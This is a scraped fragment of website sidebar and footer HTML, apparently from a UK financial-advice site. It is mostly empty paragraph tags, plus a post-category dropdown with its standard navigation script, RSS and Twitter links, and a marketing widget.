\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n													</ul>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n			</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"categories-3\" class=\"widget widget_categories\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"heading\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>Post Categories</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var dropdown = document.getElementById(\"cat\"); function onCatChange() { if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></a></div>\r\n<div id=\"social_links-widget-2\" class=\"widget social_links\">\r\n<div class=\"heading\">\r\n\r\nGet Social\r\n\r\n</div>\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"rss\"><a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>\r\n<div class=\"popup\">\r\n<div class=\"holder\">\r\n\r\nRSS\r\n\r\n</div>\r\n</div></li>\r\n</ul>\r\n</ul>\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"twitter\"><a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>\r\n<div class=\"popup\">\r\n<div class=\"holder\">\r\n\r\nTwitter\r\n\r\n</div>\r\n</div></li>\r\n</ul>\r\n</ul>\r\n</div>\r\n<div id=\"text-23\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\" /></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n	</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<footer class=\"footer-area\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"avada-row\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p